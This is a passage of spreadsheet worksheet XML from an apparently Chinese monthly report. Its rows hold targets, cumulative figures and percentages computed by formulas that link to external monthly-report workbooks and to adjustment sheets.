        <f>J37+J40</f>
        <v>0</v>
      </c>
      <c r="K36" s="194">
        <f>J36+调整表!K36</f>
        <v>0</v>
      </c>
      <c r="L36" s="194">
        <f>K36+yc!L36</f>
        <v>0</v>
      </c>
      <c r="M36" s="225"/>
      <c r="N36" s="195"/>
      <c r="O36" s="228"/>
      <c r="P36" s="192" t="s">
        <v>269</v>
      </c>
      <c r="Q36" s="192"/>
      <c r="R36" s="193" t="s">
        <v>270</v>
      </c>
      <c r="S36" s="229" t="s">
        <v>213</v>
      </c>
      <c r="T36" s="193" t="s">
        <v>271</v>
      </c>
      <c r="U36" s="230" t="s">
        <v>272</v>
      </c>
      <c r="V36" s="230" t="s">
        <v>273</v>
      </c>
      <c r="W36" s="230" t="s">
        <v>274</v>
      </c>
      <c r="X36" s="193" t="s">
        <v>275</v>
      </c>
      <c r="Y36" s="230" t="s">
        <v>276</v>
      </c>
      <c r="Z36" s="229" t="s">
        <v>218</v>
      </c>
    </row>
    <row r="37" ht="15.75" customHeight="1" spans="1:26">
      <c r="A37" s="191"/>
      <c r="B37" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C37" s="193"/>
      <c r="D37" s="193"/>
      <c r="E37" s="194">
        <v>150000</v>
      </c>
      <c r="F37" s="194"/>
      <c r="G37" s="194"/>
      <c r="H37" s="194">
        <f>G37+调整表!H37</f>
        <v>0</v>
      </c>
      <c r="I37" s="194">
        <f>H37+yc!I37</f>
        <v>0</v>
      </c>
      <c r="J37" s="194">
        <f>SUM(J38:J39)</f>
        <v>0</v>
      </c>
      <c r="K37" s="194">
        <f>J37+调整表!K37</f>
        <v>0</v>
      </c>
      <c r="L37" s="194">
        <f>K37+yc!L37</f>
        <v>0</v>
      </c>
      <c r="M37" s="225"/>
      <c r="N37" s="195"/>
      <c r="O37" s="197" t="s">
        <v>268</v>
      </c>
      <c r="P37" s="218" t="s">
        <v>229</v>
      </c>
      <c r="Q37" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R37" s="231">
        <f>[10]月报!$P$7</f>
        <v>0</v>
      </c>
      <c r="S37" s="232">
        <f>[10]月报!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T37" s="233">
        <f>[10]月报!$R$7</f>
        <v>0</v>
      </c>
      <c r="U37" s="234">
        <f>T37+调整表!U37</f>
        <v>0</v>
      </c>
      <c r="V37" s="234">
        <f>U37+yc!V37</f>
        <v>0</v>
      </c>
      <c r="W37" s="235">
        <f>[10]月报!$V$7</f>
        <v>0</v>
      </c>
      <c r="X37" s="234">
        <f>W37+调整表!X37</f>
        <v>0</v>
      </c>
      <c r="Y37" s="235">
        <f>X37+yc!Y37</f>
        <v>0</v>
      </c>
      <c r="Z37" s="235">
        <f>[10]月报!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" spans="1:26">
      <c r="A38" s="191"/>
      <c r="B38" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C38" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D38" s="193"/>
      <c r="E38" s="194"/>
      <c r="F38" s="194"/>
      <c r="G38" s="225"/>
      <c r="H38" s="194">
        <f>G38+调整表!H38</f>
        <v>0</v>
      </c>
      <c r="I38" s="194">
        <f>H38+yc!I38</f>
        <v>0</v>
      </c>
      <c r="J38" s="194"/>
      <c r="K38" s="194">
        <f>J38+调整表!K38</f>
        <v>0</v>
      </c>
      <c r="L38" s="194">
        <f>K38+yc!L38</f>
        <v>0</v>
      </c>
      <c r="M38" s="194"/>
      <c r="N38" s="195"/>
      <c r="O38" s="200"/>
      <c r="P38" s="236"/>
      <c r="Q38" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R38" s="237">
        <f>[10]月报!$P$10</f>
        <v>0</v>
      </c>
      <c r="S38" s="235">
        <f>[10]月报!$Q$10</f>
        <v>9645.331</v>
      </c>
      <c r="T38" s="235">
        <f>[10]月报!$R$10</f>
        <v>0</v>
      </c>
      <c r="U38" s="234">
        <f>T38+调整表!U38</f>
        <v>5520.34</v>
      </c>
      <c r="V38" s="234">
        <f>U38+yc!V38</f>
        <v>264660.06</v>
      </c>
      <c r="W38" s="235">
        <f>[10]月报!$V$10</f>
        <v>0</v>
      </c>
      <c r="X38" s="234">
        <f>W38+调整表!X38</f>
        <v>7808</v>
      </c>
      <c r="Y38" s="235">
        <f>X38+yc!Y38</f>
        <v>263915</v>
      </c>
      <c r="Z38" s="235">
        <f>[10]月报!$Y$10</f>
        <v>7357.671</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" spans="1:26">
      <c r="A39" s="191"/>
      <c r="B39" s="191"/>
      <c r="C39" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D39" s="193"/>
      <c r="E39" s="194"/>
      <c r="F39" s="194"/>
      <c r="G39" s="194"/>
      <c r="H39" s="194">
        <f>G39+调整表!H39</f>
        <v>0</v>
      </c>
      <c r="I39" s="194">
        <f>H39+yc!I39</f>
        <v>0</v>
      </c>
      <c r="J39" s="194"/>
      <c r="K39" s="194">
        <f>J39+调整表!K39</f>
        <v>0</v>
      </c>
      <c r="L39" s="194">
        <f>K39+yc!L39</f>
        <v>0</v>
      </c>
      <c r="M39" s="194"/>
      <c r="N39" s="195"/>
      <c r="O39" s="200"/>
      <c r="P39" s="236"/>
      <c r="Q39" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R39" s="231">
        <f>[10]月报!$P$50</f>
        <v>0</v>
      </c>
      <c r="S39" s="232">
        <f>[10]月报!$Q$50</f>
        <v>1231.546</v>
      </c>
      <c r="T39" s="238">
        <f>[10]月报!$R$50</f>
        <v>0</v>
      </c>
      <c r="U39" s="234">
        <f>T39+调整表!U39</f>
        <v>9224.755</v>
      </c>
      <c r="V39" s="234">
        <f>U39+yc!V39</f>
        <v>88038.354</v>
      </c>
      <c r="W39" s="235">
        <f>[10]月报!$V$50</f>
        <v>0</v>
      </c>
      <c r="X39" s="234">
        <f>W39+调整表!X39</f>
        <v>9324</v>
      </c>
      <c r="Y39" s="235">
        <f>X39+yc!Y39</f>
        <v>88083</v>
      </c>
      <c r="Z39" s="238">
        <f>[10]月报!$Y$50</f>
        <v>1618.701</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" spans="1:26">
      <c r="A40" s="191"/>
      <c r="B40" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C40" s="193"/>
      <c r="D40" s="193"/>
      <c r="E40" s="194"/>
      <c r="F40" s="194"/>
      <c r="G40" s="225"/>
      <c r="H40" s="194">
        <f>G40+调整表!H40</f>
        <v>0</v>
      </c>
      <c r="I40" s="194">
        <f>H40+yc!I40</f>
        <v>0</v>
      </c>
      <c r="J40" s="194"/>
      <c r="K40" s="194">
        <f>J40+调整表!K40</f>
        <v>0</v>
      </c>
      <c r="L40" s="194">
        <f>K40+yc!L40</f>
        <v>0</v>
      </c>
      <c r="M40" s="194"/>
      <c r="N40" s="195"/>
      <c r="O40" s="200"/>
      <c r="P40" s="219"/>
      <c r="Q40" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R40" s="239">
        <f>[10]月报!$P$44</f>
        <v>0</v>
      </c>
      <c r="S40" s="240">
        <f>[10]月报!$Q$44</f>
        <v>0</v>
      </c>
      <c r="T40" s="238">
        <f>[10]月报!$R$44</f>
        <v>0</v>
      </c>
      <c r="U40" s="234">
        <f>[10]月报!$S$44</f>
        <v>0</v>
      </c>
      <c r="V40" s="234">
        <f>[10]月报!$T$44</f>
        <v>0</v>
      </c>
      <c r="W40" s="235">
        <f>[10]月报!$V$44</f>
        <v>0</v>
      </c>
      <c r="X40" s="234">
        <f>[10]月报!$W$44</f>
        <v>0</v>
      </c>
      <c r="Y40" s="235">
        <f>[10]月报!$X$44</f>
        <v>0</v>
      </c>
      <c r="Z40" s="238">
        <f>[10]月报!$Y$44</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" spans="1:26">
      <c r="A41" s="191" t="s">
        <v>252</v>
      </c>
      <c r="B41" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C41" s="193"/>
      <c r="D41" s="193"/>
      <c r="E41" s="194">
        <v>12000</v>
      </c>
      <c r="F41" s="194">
        <f>[12]月报!$D$16</f>
        <v>26129.76</v>
      </c>
      <c r="G41" s="225">
        <f>[12]月报!$E$16</f>
        <v>0</v>
      </c>
      <c r="H41" s="194">
        <f>G41+调整表!H41</f>
        <v>24414</v>
      </c>
      <c r="I41" s="194">
        <f>H41+yc!I41</f>
        <v>149390</v>
      </c>
      <c r="J41" s="194">
        <f>[12]月报!$I$16</f>
        <v>0</v>
      </c>
      <c r="K41" s="194">
        <f>J41+调整表!K41</f>
        <v>27253.05</v>
      </c>
      <c r="L41" s="194">
        <f>K41+yc!L41</f>
        <v>148646.59</v>
      </c>
      <c r="M41" s="194">
        <f>[12]月报!$L$16</f>
        <v>23290.71</v>
      </c>
      <c r="N41" s="195">
        <f>M41/30000*100</f>
        <v>77.6357</v>
      </c>
      <c r="O41" s="200"/>
      <c r="P41" s="213" t="s">
        <v>237</v>
      </c>
      <c r="Q41" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R41" s="239">
        <f>[11]月报!$P$7</f>
        <v>0</v>
      </c>
      <c r="S41" s="240">
        <f>[11]月报!$Q$7</f>
        <v>0.621</v>
      </c>
      <c r="T41" s="238">
        <f>[11]月报!$R$7</f>
        <v>0</v>
      </c>
      <c r="U41" s="234">
        <f>T41+调整表!U41</f>
        <v>0</v>
      </c>
      <c r="V41" s="234">
        <f>U41+yc!V41</f>
        <v>0.621000000000095</v>
      </c>
      <c r="W41" s="235">
        <f>[11]月报!$V$7</f>
        <v>0</v>
      </c>
      <c r="X41" s="234">
        <f>W41+调整表!X41</f>
        <v>0</v>
      </c>
      <c r="Y41" s="235">
        <f>X41+yc!Y41</f>
        <v>9.45910016980633e-14</v>
      </c>
      <c r="Z41" s="238">
        <f>[11]月报!$Y$7</f>
        <v>0.621</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" spans="1:26">
      <c r="A42" s="191"/>
      <c r="B42" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C42" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D42" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E42" s="194">
        <v>0</v>
      </c>
      <c r="F42" s="194">
        <f>[12]月报!$D$13</f>
        <v>0</v>
      </c>
      <c r="G42" s="225">
        <f>[12]月报!$E$13</f>
        <v>0</v>
      </c>
      <c r="H42" s="194">
        <f>G42+调整表!H42</f>
        <v>0</v>
      </c>
      <c r="I42" s="194">
        <f>H42+yc!I42</f>
        <v>0</v>
      </c>
      <c r="J42" s="194">
        <f>[12]月报!$I$13</f>
        <v>0</v>
      </c>
      <c r="K42" s="194">
        <f>J42+调整表!K42</f>
        <v>0</v>
      </c>
      <c r="L42" s="194">
        <f>K42+yc!L42</f>
        <v>0</v>
      </c>
      <c r="M42" s="194">
        <f>[12]月报!$L$13</f>
        <v>0</v>
      </c>
      <c r="N42" s="207">
        <f>(M42+M43)/50000*100</f>
        <v>0</v>
      </c>
      <c r="O42" s="200"/>
      <c r="P42" s="215"/>
      <c r="Q42" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R42" s="237">
        <f>[11]月报!$P$8</f>
        <v>14000</v>
      </c>
      <c r="S42" s="238">
        <f>[11]月报!$Q$8</f>
        <v>8478.836</v>
      </c>
      <c r="T42" s="238">
        <f>[11]月报!$R$8</f>
        <v>0</v>
      </c>
      <c r="U42" s="234">
        <f>T42+调整表!U42</f>
        <v>9627.68</v>
      </c>
      <c r="V42" s="235">
        <f>U42+yc!V42</f>
        <v>217214.65</v>
      </c>
      <c r="W42" s="235">
        <f>[11]月报!$V$8</f>
        <v>0</v>
      </c>
      <c r="X42" s="234">
        <f>W42+调整表!X42</f>
        <v>13382</v>
      </c>
      <c r="Y42" s="235">
        <f>X42+yc!Y42</f>
        <v>215853</v>
      </c>
      <c r="Z42" s="238">
        <f>[11]月报!$Y$8</f>
        <v>4724.516</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" spans="1:26">
      <c r="A43" s="191"/>
      <c r="B43" s="193"/>
      <c r="C43" s="193"/>
      <c r="D43" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E43" s="194"/>
      <c r="F43" s="194">
        <f>[12]月报!$D$14</f>
        <v>0</v>
      </c>
      <c r="G43" s="225">
        <f>[12]月报!$E$14</f>
        <v>0</v>
      </c>
      <c r="H43" s="194">
        <f>G43+调整表!H43</f>
        <v>0</v>
      </c>
      <c r="I43" s="194">
        <f>H43+yc!I43</f>
        <v>0</v>
      </c>
      <c r="J43" s="194">
        <f>[12]月报!$I$14</f>
        <v>0</v>
      </c>
      <c r="K43" s="194">
        <f>J43+调整表!K43</f>
        <v>0</v>
      </c>
      <c r="L43" s="194">
        <f>K43+yc!L43</f>
        <v>0</v>
      </c>
      <c r="M43" s="194">
        <f>[12]月报!$L$14</f>
        <v>0</v>
      </c>
      <c r="N43" s="212"/>
      <c r="O43" s="200"/>
      <c r="P43" s="215"/>
      <c r="Q43" s="193" t="s">
        <v>281</v>
      </c>
      <c r="R43" s="241"/>
      <c r="S43" s="238"/>
      <c r="T43" s="238"/>
      <c r="U43" s="234"/>
      <c r="V43" s="235"/>
      <c r="W43" s="235"/>
      <c r="X43" s="234"/>
      <c r="Y43" s="235"/>
      <c r="Z43" s="238"/>
    </row>
    <row r="44" ht="15.75" customHeight="1" spans="1:26">
      <c r="A44" s="191"/>
      <c r="B44" s="193"/>
      <c r="C44" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D44" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E44" s="194"/>
      <c r="F44" s="194"/>
      <c r="G44" s="225">
        <f>[12]月报!$E$44</f>
        <v>0</v>
      </c>
      <c r="H44" s="194">
        <f>G44+调整表!H44</f>
        <v>0</v>
      </c>
      <c r="I44" s="194">
        <f>H44+yc!I44</f>
        <v>128550.22</v>
      </c>
      <c r="J44" s="194">
        <f>[12]月报!$I$44</f>
        <v>0</v>
      </c>
      <c r="K44" s="194">
        <f>J44+调整表!K44</f>
        <v>0</v>
      </c>
      <c r="L44" s="194">
        <f>K44+yc!L44</f>
        <v>0</v>
      </c>
      <c r="M44" s="194">
        <f>[12]月报!$L$15</f>
        <v>48773.78</v>
      </c>
      <c r="N44" s="195"/>
      <c r="O44" s="200"/>
      <c r="P44" s="215"/>
      <c r="Q44" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R44" s="237">
        <f>[11]月报!$P$29</f>
        <v>8000</v>
      </c>
      <c r="S44" s="238">
        <f>[11]月报!$Q$29</f>
        <v>2299.457</v>
      </c>
      <c r="T44" s="238">
        <f>[11]月报!$R$29</f>
        <v>0</v>
      </c>
      <c r="U44" s="234">
        <f>T44+调整表!U44</f>
        <v>7163.302</v>
      </c>
      <c r="V44" s="235">
        <f>U44+yc!V44</f>
        <v>71916.47</v>
      </c>
      <c r="W44" s="235">
        <f>[11]月报!$V$29</f>
        <v>0</v>
      </c>
      <c r="X44" s="234">
        <f>W44+调整表!X44</f>
        <v>5409</v>
      </c>
      <c r="Y44" s="235">
        <f>X44+yc!Y44</f>
        <v>71819</v>
      </c>
      <c r="Z44" s="238">
        <f>[11]月报!$Y$29</f>
        <v>4159.479</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" spans="1:26">
      <c r="A45" s="191"/>
      <c r="B45" s="193"/>
      <c r="C45" s="193"/>
      <c r="D45" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E45" s="194"/>
      <c r="F45" s="194"/>
      <c r="G45" s="225">
        <f>[12]月报!$E$55</f>
        <v>0</v>
      </c>
      <c r="H45" s="194">
        <f>G45+调整表!H45</f>
        <v>0</v>
      </c>
      <c r="I45" s="194">
        <f>H45+yc!I45</f>
        <v>0</v>
      </c>
      <c r="J45" s="225">
        <f>[12]月报!$I$55</f>
        <v>0</v>
      </c>
      <c r="K45" s="194">
        <f>J45+调整表!K45</f>
        <v>0</v>
      </c>
      <c r="L45" s="194">
        <f>K45+yc!L45</f>
        <v>0</v>
      </c>
      <c r="M45" s="194"/>
      <c r="N45" s="195"/>
      <c r="O45" s="200"/>
      <c r="P45" s="214"/>
      <c r="Q45" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R45" s="237">
        <f>[11]月报!$P$23</f>
        <v>0</v>
      </c>
      <c r="S45" s="238">
        <f>[11]月报!$Q$23</f>
        <v>0</v>
      </c>
      <c r="T45" s="238">
        <f>[11]月报!$R$23</f>
        <v>0</v>
      </c>
      <c r="U45" s="234">
        <f>[11]月报!$S$23</f>
        <v>0</v>
      </c>
      <c r="V45" s="235">
        <f>[11]月报!$T$23</f>
        <v>1.329</v>
      </c>
      <c r="W45" s="235">
        <f>[11]月报!$V$23</f>
        <v>0</v>
      </c>
      <c r="X45" s="234">
        <f>[11]月报!$W$23</f>
        <v>0</v>
      </c>
      <c r="Y45" s="235">
        <f>[11]月报!$X$23</f>
        <v>1.329</v>
      </c>
      <c r="Z45" s="238">
        <f>[11]月报!$Y$23</f>
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" spans="1:26">
      <c r="A46" s="191"/>
      <c r="B46" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C46" s="193"/>
      <c r="D46" s="193"/>
      <c r="E46" s="194"/>
      <c r="F46" s="194"/>
      <c r="G46" s="194"/>
      <c r="H46" s="194">
        <f>G46+调整表!H46</f>
        <v>0</v>
      </c>
      <c r="I46" s="194">
        <f>H46+yc!I46</f>
        <v>0</v>
      </c>
      <c r="J46" s="194">
        <f>J47+J50</f>
        <v>0</v>
      </c>
      <c r="K46" s="194">
        <f>J46+调整表!K46</f>
        <v>0</v>
      </c>
      <c r="L46" s="194">
        <f>K46+yc!L46</f>
        <v>0</v>
      </c>
      <c r="M46" s="194"/>
      <c r="N46" s="195"/>
      <c r="O46" s="200"/>
      <c r="P46" s="242" t="s">
        <v>252</v>
      </c>
      <c r="Q46" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R46" s="237">
        <f>[12]月报!$P$7</f>
        <v>0</v>
      </c>
      <c r="S46" s="238">
        <f>[12]月报!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T46" s="238">
        <f>[12]月报!$R$7</f>
        <v>0</v>
      </c>
      <c r="U46" s="234">
        <f>T46+调整表!U46</f>
        <v>0</v>
      </c>
      <c r="V46" s="234">
        <f>U46+yc!V46</f>
        <v>0</v>
      </c>
      <c r="W46" s="235">
        <f>[12]月报!$V$7</f>
        <v>0</v>
      </c>
      <c r="X46" s="234">
        <f>W46+调整表!X46</f>
        <v>0</v>
      </c>
      <c r="Y46" s="235">
        <f>X46+yc!Y46</f>
        <v>0</v>
      </c>
      <c r="Z46" s="238">
        <f>[12]月报!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" spans="1:26">
      <c r="A47" s="191"/>
      <c r="B47" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C47" s="193"/>
      <c r="D47" s="193"/>
      <c r="E47" s="194">
        <v>12000</v>
      </c>
      <c r="F47" s="194"/>
      <c r="G47" s="225"/>
      <c r="H47" s="194">
        <f>G47+调整表!H47</f>
        <v>0</v>
      </c>
      <c r="I47" s="194">
        <f>H47+yc!I47</f>
        <v>0</v>
      </c>
      <c r="J47" s="194">
        <f>SUM(J48:J49)</f>
        <v>0</v>
      </c>
      <c r="K47" s="194">
        <f>J47+调整表!K47</f>
        <v>0</v>
      </c>
      <c r="L47" s="194">
        <f>K47+yc!L47</f>
        <v>0</v>
      </c>
      <c r="M47" s="194"/>
      <c r="N47" s="195"/>
      <c r="O47" s="200"/>
      <c r="P47" s="243"/>
      <c r="Q47" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R47" s="237">
        <f>[12]月报!$P$8</f>
        <v>0</v>
      </c>
      <c r="S47" s="238">
        <f>[12]月报!$Q$8</f>
        <v>0</v>
      </c>
      <c r="T47" s="238">
        <f>[12]月报!$R$8</f>
        <v>0</v>
      </c>
      <c r="U47" s="234">
        <f>T47+调整表!U47</f>
        <v>0</v>
      </c>
      <c r="V47" s="234">
        <f>U47+yc!V47</f>
        <v>0</v>
      </c>
      <c r="W47" s="235">
        <f>[12]月报!$V$8</f>
        <v>0</v>
      </c>
      <c r="X47" s="234">
        <f>W47+调整表!X47</f>
        <v>0</v>
      </c>
      <c r="Y47" s="235">
        <f>X47+yc!Y47</f>
        <v>0</v>
      </c>
      <c r="Z47" s="238">
        <f>[12]月报!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" spans="1:26">
      <c r="A48" s="191"/>
      <c r="B48" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C48" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D48" s="193"/>
      <c r="E48" s="194"/>
      <c r="F48" s="194"/>
      <c r="G48" s="225"/>
      <c r="H48" s="194">
        <f>G48+调整表!H48</f>
        <v>0</v>
      </c>
      <c r="I48" s="194">
        <f>H48+yc!I48</f>
        <v>0</v>
      </c>
      <c r="J48" s="194"/>
      <c r="K48" s="194">
        <f>J48+调整表!K48</f>
        <v>0</v>
      </c>
      <c r="L48" s="194">
        <f>K48+yc!L48</f>
        <v>0</v>
      </c>
      <c r="M48" s="194"/>
      <c r="N48" s="195"/>
      <c r="O48" s="200"/>
      <c r="P48" s="243"/>
      <c r="Q48" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R48" s="237">
        <f>[12]月报!$P$34</f>
        <v>0</v>
      </c>
      <c r="S48" s="238">
        <f>[12]月报!$Q$34</f>
        <v>1585.503</v>
      </c>
      <c r="T48" s="238">
        <f>[12]月报!$R$34</f>
        <v>0</v>
      </c>
      <c r="U48" s="234">
        <f>T48+调整表!U48</f>
        <v>1032.38</v>
      </c>
      <c r="V48" s="234">
        <f>U48+yc!V48</f>
        <v>7058.91</v>
      </c>
      <c r="W48" s="235">
        <f>[12]月报!$V$8</f>
        <v>0</v>
      </c>
      <c r="X48" s="234">
        <f>W48+调整表!X48</f>
        <v>0</v>
      </c>
      <c r="Y48" s="235">
        <f>X48+yc!Y48</f>
        <v>0</v>
      </c>
      <c r="Z48" s="238">
        <f>[12]月报!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" spans="1:26">
      <c r="A49" s="191"/>
      <c r="B49" s="191"/>
      <c r="C49" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D49" s="193"/>
      <c r="E49" s="194"/>
      <c r="F49" s="194"/>
      <c r="G49" s="194"/>
      <c r="H49" s="194">
        <f>G49+调整表!H49</f>
        <v>0</v>
      </c>
      <c r="I49" s="194">
        <f>H49+yc!I49</f>
        <v>0</v>
      </c>
      <c r="J49" s="194"/>
      <c r="K49" s="194">
        <f>J49+调整表!K49</f>
        <v>0</v>
      </c>
      <c r="L49" s="194">
        <f>K49+yc!L49</f>
        <v>0</v>
      </c>
      <c r="M49" s="194"/>
      <c r="N49" s="195"/>
      <c r="O49" s="200"/>
      <c r="P49" s="197" t="s">
        <v>304</v>
      </c>
      <c r="Q49" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R49" s="237">
        <f>[13]月报!$P$8</f>
        <v>15340</v>
      </c>
      <c r="S49" s="238">
        <f>[13]月报!$Q$8</f>
        <v>10593.625</v>
      </c>
      <c r="T49" s="238">
        <f>[13]月报!$R$8</f>
        <v>0</v>
      </c>
      <c r="U49" s="234">
        <f>T49+调整表!U49</f>
        <v>0</v>
      </c>
      <c r="V49" s="234">
        <f>U49+yc!V49</f>
        <v>179888.95</v>
      </c>
      <c r="W49" s="235">
        <f>[13]月报!$V$8</f>
        <v>0</v>
      </c>
      <c r="X49" s="234">
        <f>W49+调整表!X49</f>
        <v>7071.63</v>
      </c>
      <c r="Y49" s="235">
        <f>X49+yc!Y49</f>
        <v>183601.97</v>
      </c>
      <c r="Z49" s="238">
        <f>[13]月报!$Y$8</f>
        <v>2798.62500000004</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" spans="1:26">
      <c r="A50" s="191"/>
      <c r="B50" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C50" s="193"/>
      <c r="D50" s="193"/>
      <c r="E50" s="194"/>
      <c r="F50" s="194"/>
      <c r="G50" s="225"/>
      <c r="H50" s="194">
        <f>G50+调整表!H50</f>
        <v>0</v>
      </c>
      <c r="I50" s="194">
        <f>H50+yc!I50</f>
        <v>0</v>
      </c>
      <c r="J50" s="194"/>
      <c r="K50" s="194">
        <f>J50+调整表!K50</f>
        <v>0</v>
      </c>
      <c r="L50" s="194">
        <f>K50+yc!L50</f>
        <v>0</v>
      </c>
      <c r="M50" s="194"/>
      <c r="N50" s="195"/>
      <c r="O50" s="200"/>
      <c r="P50" s="200"/>
      <c r="Q50" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R50" s="237">
        <f>[13]月报!$P$7</f>
        <v>200</v>
      </c>
      <c r="S50" s="238">
        <f>[13]月报!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T50" s="238">
        <f>[13]月报!$R$7</f>
        <v>0</v>
      </c>
      <c r="U50" s="234">
        <f>T50+调整表!U50</f>
        <v>0</v>
      </c>
      <c r="V50" s="234">
        <f>U50+yc!V50</f>
        <v>0</v>
      </c>
      <c r="W50" s="235">
        <f>[13]月报!$V$7</f>
        <v>0</v>
      </c>
      <c r="X50" s="234">
        <f>W50+调整表!X50</f>
        <v>0</v>
      </c>
      <c r="Y50" s="235">
        <f>X50+yc!Y50</f>
        <v>0</v>
      </c>
      <c r="Z50" s="238">
        <f>[13]月报!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" spans="1:26">
      <c r="A51" s="191" t="s">
        <v>304</v>
      </c>
      <c r="B51" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C51" s="193"/>
      <c r="D51" s="193"/>
      <c r="E51" s="194">
        <v>160000</v>
      </c>
      <c r="F51" s="194">
        <f>[13]月报!$D$24</f>
        <v>48852.6839999998</v>
      </c>
      <c r="G51" s="225">
        <f>[13]月报!$E$24</f>
        <v>0</v>
      </c>
      <c r="H51" s="194">
        <f>G51+调整表!H51</f>
        <v>136470</v>
      </c>
      <c r="I51" s="194">
        <f>H51+yc!I51</f>
        <v>1512869</v>
      </c>
      <c r="J51" s="194">
        <f>[13]月报!$I$24</f>
        <v>0</v>
      </c>
      <c r="K51" s="194">
        <f>J51+调整表!K51</f>
        <v>148811.205</v>
      </c>
      <c r="L51" s="194">
        <f>K51+yc!L51</f>
        <v>1511935.136</v>
      </c>
      <c r="M51" s="194">
        <f>[13]月报!$L$24</f>
        <v>36357.6689999998</v>
      </c>
      <c r="N51" s="195">
        <f>M51/45000*100</f>
        <v>80.7948199999996</v>
      </c>
      <c r="O51" s="200"/>
      <c r="P51" s="200"/>
      <c r="Q51" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R51" s="237">
        <f>[13]月报!$P$30</f>
        <v>8550</v>
      </c>
      <c r="S51" s="238">
        <f>[13]月报!$Q$30</f>
        <v>3251.37400000001</v>
      </c>
      <c r="T51" s="238">
        <f>[13]月报!$R$30</f>
        <v>0</v>
      </c>
      <c r="U51" s="234">
        <f>T51+调整表!U51</f>
        <v>5220.27</v>
      </c>
      <c r="V51" s="234">
        <f>U51+yc!V51</f>
        <v>68218.741</v>
      </c>
      <c r="W51" s="235">
        <f>[13]月报!$V$30</f>
        <v>0</v>
      </c>
      <c r="X51" s="234">
        <f>W51+调整表!X51</f>
        <v>5164.789</v>
      </c>
      <c r="Y51" s="235">
        <f>X51+yc!Y51</f>
        <v>65781.026</v>
      </c>
      <c r="Z51" s="238">
        <f>[13]月报!$Y$30</f>
        <v>3305.40100000001</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" spans="1:26">
      <c r="A52" s="191"/>
      <c r="B52" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C52" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D52" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E52" s="194">
        <v>175000</v>
      </c>
      <c r="F52" s="194">
        <f>[13]月报!$D$19</f>
        <v>105046.44300005</v>
      </c>
      <c r="G52" s="225">
        <f>[13]月报!$E$19</f>
        <v>0</v>
      </c>
      <c r="H52" s="194">
        <f>G52+调整表!H52</f>
        <v>60840.1700000006</v>
      </c>
      <c r="I52" s="194">
        <f>H52+yc!I52</f>
        <v>1444407.42</v>
      </c>
      <c r="J52" s="194">
        <f>[13]月报!$I$19</f>
        <v>0</v>
      </c>
      <c r="K52" s="194">
        <f>J52+调整表!K52</f>
        <v>129122.14</v>
      </c>
      <c r="L52" s="194">
        <f>K52+yc!L52</f>
        <v>1410816.34</v>
      </c>
      <c r="M52" s="194">
        <f>[13]月报!$L$19</f>
        <v>36764.4730000508</v>
      </c>
      <c r="N52" s="207">
        <f>(M52+M53)/(65000+80000)*100</f>
        <v>25.3548089655523</v>
      </c>
      <c r="O52" s="200"/>
      <c r="P52" s="244"/>
      <c r="Q52" s="193" t="s">
        <v>280</v>
      </c>
      <c r="R52" s="241"/>
      <c r="S52" s="233"/>
      <c r="T52" s="238"/>
      <c r="U52" s="234"/>
      <c r="V52" s="234"/>
      <c r="W52" s="235"/>
      <c r="X52" s="234"/>
      <c r="Y52" s="235"/>
      <c r="Z52" s="238"/>
    </row>
    <row r="53" ht="15.75" customHeight="1" spans="1:26">
      <c r="A53" s="191"/>
      <c r="B53" s="193"/>
      <c r="C53" s="193"/>
      <c r="D53" s="206" t="s">
        <v>248</v>
      </c>
